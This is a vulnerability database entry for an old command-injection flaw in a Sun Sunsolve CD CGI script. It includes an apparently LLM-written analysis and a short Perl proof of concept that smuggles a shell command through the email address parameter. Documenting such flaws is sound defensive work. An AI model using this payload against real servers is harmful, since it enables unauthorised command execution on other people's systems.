CVE-2002-0436
Description
sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
5cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*+ 1 more
- cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*
- cpe:2.3:o:sun:solaris:8.0:*:x86:*:*:*:*:*
cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*
- cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*
Patches
Vulnerability mechanics
Root cause
"The sscd_suncourier.pl CGI script does not sanitize shell metacharacters in the email address parameter, allowing arbitrary command execution."
Attack vector
A remote attacker can send a crafted POST request to the `sscd_suncourier.pl` CGI script. By including shell metacharacters, such as the pipe symbol (|), within the `emailaddr` parameter, the attacker can inject and execute arbitrary commands on the server with the privileges of the script. The provided exploit demonstrates using `| id > /tmp/foo|` to execute the `id` command [ref_id=1].
Affected code
The vulnerability exists within the `sscd_suncourier.pl` CGI script, which is part of the Sun Sunsolve CD pack. The script fails to properly sanitize input provided in the `emailaddr` parameter, allowing for the injection of shell metacharacters [ref_id=1].
What the fix does
The patch is not available in the provided bundle. The advisory indicates that the CGI script does not adequately sanitize input, specifically mentioning the failure to remove special characters like the pipe (|) character [ref_id=1]. Remediation would involve properly sanitizing or escaping shell metacharacters in the `emailaddr` parameter before it is processed by the script.
Preconditions
- networkThe target system must be running the Sun Sunsolve CD pack with the `sscd_suncourier.pl` script accessible.
- inputThe attacker must be able to send a POST request to the `sscd_suncourier.pl` script.
Reproduction
```perl #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); ua = new LWP::UserAgent; $ua->agent("Scrapers"); my $req = POST 'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl', [ step => "submit" , emailaddr => "foo\@bar.com| id > /tmp/foo|"]; $res = $ua->request($req); print $res->as_string; print "code", $res->code, "\n"; ```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- www.iss.net/security_center/static/8435.phpnvdVendor Advisory
- www.securityfocus.com/archive/1/261544nvdVendor Advisory
- www.securityfocus.com/bid/4269nvdVendor Advisory
News mentions
0No linked articles in our index yet.